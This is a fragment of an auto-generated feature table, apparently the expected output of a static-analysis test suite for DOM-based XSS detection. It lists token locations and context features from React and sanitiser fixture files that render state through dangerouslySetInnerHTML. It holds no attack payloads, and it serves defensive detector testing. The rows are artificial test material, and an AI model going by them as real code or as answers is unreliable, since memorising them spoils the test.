autogenerated/Xss/DomBasedXss/react-use-state.js:29:10:29:14 | state | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:10:29:14 | state | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:10:29:14 | state | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:10:29:14 | state | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:10:29:14 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:10:29:14 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:17:29:24 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:17:29:24 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:17:29:24 | setState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:17:29:24 | setState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:17:29:24 | setState | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:17:29:24 | setState | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:17:29:24 | setState | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:17:29:24 | setState | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:17:29:24 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:17:29:24 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:36 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:36 | useState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:36 | useState | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:36 | useState | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:36 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:43 | exceptional return of useState('foo') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:43 | exceptional return of useState('foo') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:43 | exceptional return of useState('foo') | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:43 | exceptional return of useState('foo') | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:43 | exceptional return of useState('foo') | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:43 | useState('foo') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:43 | useState('foo') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:43 | useState('foo') | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:43 | useState('foo') | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:29:29:29:43 | useState('foo') | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:29:38:29:42 | 'foo' | CalleeFlexibleAccessPath | useState | | autogenerated/Xss/DomBasedXss/react-use-state.js:29:38:29:42 | 'foo' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-state.js:29:38:29:42 | 'foo' | calleeImports | react | @@ -14734,6 +107314,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-use-state.js:29:38:29:42 | 'foo' | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:29:38:29:42 | 'foo' | enclosingFunctionName | setStateValueSafe | | autogenerated/Xss/DomBasedXss/react-use-state.js:29:38:29:42 | 'foo' | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:12 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:12 | setState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:12 | setState | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:12 | setState | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:12 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:20 | exceptional return of setState('safe') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:20 | exceptional return of setState('safe') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:20 | exceptional return of setState('safe') | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:20 | exceptional return of setState('safe') | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:20 | exceptional return of setState('safe') | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:20 | setState('safe') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:20 | setState('safe') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:20 | setState('safe') | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:20 | setState('safe') | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:30:5:30:20 | setState('safe') | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:30:14:30:19 | 'safe' | CalleeFlexibleAccessPath | setState | | autogenerated/Xss/DomBasedXss/react-use-state.js:30:14:30:19 | 'safe' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-state.js:30:14:30:19 | 'safe' | calleeImports | react | @@ -14742,6 +107337,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-use-state.js:30:14:30:19 | 'safe' | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:30:14:30:19 | 'safe' | enclosingFunctionName | setStateValueSafe | | autogenerated/Xss/DomBasedXss/react-use-state.js:30:14:30:19 | 'safe' | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:12 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:12 | setState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:12 | setState | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:12 | setState | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:12 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:31 | exceptional return of setStat ... safe') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:31 | exceptional return of setStat ... safe') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:31 | exceptional return of setStat ... safe') | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:31 | exceptional return of setStat ... safe') | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:31 | exceptional return of setStat ... safe') | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:31 | setStat ... safe') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:31 | setStat ... safe') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:31 | setStat ... safe') | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:31 | setStat ... safe') | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:5:31:31 | setStat ... safe') | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | 'arguments' object of anonymous function | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | 'arguments' object of anonymous function | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | 'arguments' object of anonymous function | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | 'arguments' object of anonymous function | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | () => 'also safe' | CalleeFlexibleAccessPath | setState | | autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | () => 'also safe' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | () => 'also safe' | calleeImports | react | @@ -14750,18 +107365,247 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | () => 'also safe' | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | () => 'also safe' | enclosingFunctionName | setStateValueSafe | | autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | () => 'also safe' | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | exceptional return of anonymous function | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | exceptional return of anonymous function | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | exceptional return of anonymous function | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | exceptional return of anonymous function | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | return of anonymous function | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | return of anonymous function | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | return of anonymous function | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:14:31:30 | return of anonymous function | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:20:31:30 | 'also safe' | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:20:31:30 | 'also safe' | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:20:31:30 | 'also safe' | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:20:31:30 | 'also safe' | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:31:20:31:30 | 'also safe' | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:12:32:64 |
    | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:12:32:64 |
    | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:12:32:64 |
    | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:12:32:64 |
    | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:12:32:64 |
    | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:13:32:15 | div | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:13:32:15 | div | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:13:32:15 | div | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:13:32:15 | div | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:13:32:15 | div | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:39 | dangero ... nerHTML | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:39 | dangero ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:39 | dangero ... nerHTML | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:39 | dangero ... nerHTML | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:39 | dangero ... nerHTML | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:57 | dangero ... state}} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:57 | dangero ... state}} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:57 | dangero ... state}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:57 | dangero ... state}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:57 | dangero ... state}} | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:57 | dangero ... state}} | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:57 | dangero ... state}} | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:57 | dangero ... state}} | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:57 | dangero ... state}} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:17:32:57 | dangero ... state}} | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:32:42:32:56 | {__html: state} | assignedToPropName | dangerouslySetInnerHTML | | autogenerated/Xss/DomBasedXss/react-use-state.js:32:42:32:56 | {__html: state} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | | autogenerated/Xss/DomBasedXss/react-use-state.js:32:42:32:56 | {__html: state} | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/react-use-state.js:32:42:32:56 | {__html: state} | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:32:42:32:56 | {__html: state} | enclosingFunctionName | setStateValueSafe | | autogenerated/Xss/DomBasedXss/react-use-state.js:32:42:32:56 | {__html: state} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:48 | __html | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:48 | __html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:48 | __html | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:48 | __html | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:48 | __html | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:55 | __html: state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:55 | __html: state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:55 | __html: state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:55 | __html: state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:55 | __html: state | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:55 | __html: state | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:55 | __html: state | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:55 | __html: state | enclosingFunctionName | setStateValueSafe | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:55 | __html: state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:32:43:32:55 | __html: state | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:32:51:32:55 | state | assignedToPropName | __html | | autogenerated/Xss/DomBasedXss/react-use-state.js:32:51:32:55 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | | autogenerated/Xss/DomBasedXss/react-use-state.js:32:51:32:55 | state | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/react-use-state.js:32:51:32:55 | state | enclosingFunctionBody | state setState useState foo setState safe setState also safe div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:32:51:32:55 | state | enclosingFunctionName | setStateValueSafe | | autogenerated/Xss/DomBasedXss/react-use-state.js:32:51:32:55 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:1:0 | this | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:1:0 | this | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:1:0 | this | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:1:0 | this | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | 'arguments' object of function escapeHtml | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | 'arguments' object of function escapeHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | 'arguments' object of function escapeHtml | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | 'arguments' object of function escapeHtml | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | 'arguments' object of function escapeHtml | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | exceptional return of function escapeHtml | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | exceptional return of function escapeHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | exceptional return of function escapeHtml | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | exceptional return of function escapeHtml | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | exceptional return of function escapeHtml | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | functio ... t;');\\n} | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | functio ... t;');\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | functio ... t;');\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | return of function escapeHtml | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | return of function escapeHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | return of function escapeHtml | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | return of function escapeHtml | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:1:7:1 | return of function escapeHtml | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:10:1:19 | escapeHtml | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:10:1:19 | escapeHtml | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:10:1:19 | escapeHtml | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:21:1:21 | s | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:21:1:21 | s | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:21:1:21 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:21:1:21 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:21:1:21 | s | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:21:1:21 | s | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:21:1:21 | s | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:21:1:21 | s | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:21:1:21 | s | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:1:21:1:21 | s | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:11 | amp | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:11 | amp | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:11 | amp | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:11 | amp | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:11 | amp | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:18 | amp | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:18 | amp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:18 | amp | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:18 | amp | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:18 | amp | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:18 | amp = /&/g | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:18 | amp = /&/g | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:18 | amp = /&/g | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:18 | amp = /&/g | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:9:2:18 | amp = /&/g | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:15:2:18 | /&/g | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:15:2:18 | /&/g | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:15:2:18 | /&/g | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:15:2:18 | /&/g | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:15:2:18 | /&/g | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:21:2:22 | lt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:21:2:22 | lt | contextSurroundingFunctionParameters | (s) | +| 